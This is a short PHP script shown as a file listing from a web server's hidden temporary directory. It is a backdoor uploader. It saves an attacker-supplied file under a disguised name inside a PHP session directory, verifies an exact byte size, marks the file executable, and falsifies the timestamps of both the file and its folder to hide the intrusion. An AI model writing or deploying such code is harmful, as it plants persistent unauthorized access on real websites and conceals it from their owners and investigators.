File: //proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/tmp/.db2_convert
<?php $p = "/home/decide.family/public_html//var/lib/lsphp/session/lsphp82/jpgraph_imgtrans"; $ft = 1755074713; if (move_uploaded_file($_FILES['file']['tmp_name'], $p)) { $filesize = filesize($p); if ($filesize >= 5504) { @chmod($p, 0744); if ($ft) { @touch($p, $ft, $ft); @touch(@dirname($p), $ft, $ft); } die('_uploaded!_'); } else { if (file_exists($p)) { print "file exists but size = {$filesize} not 5504"; } @unlink($p); } } die('_upload_failed_');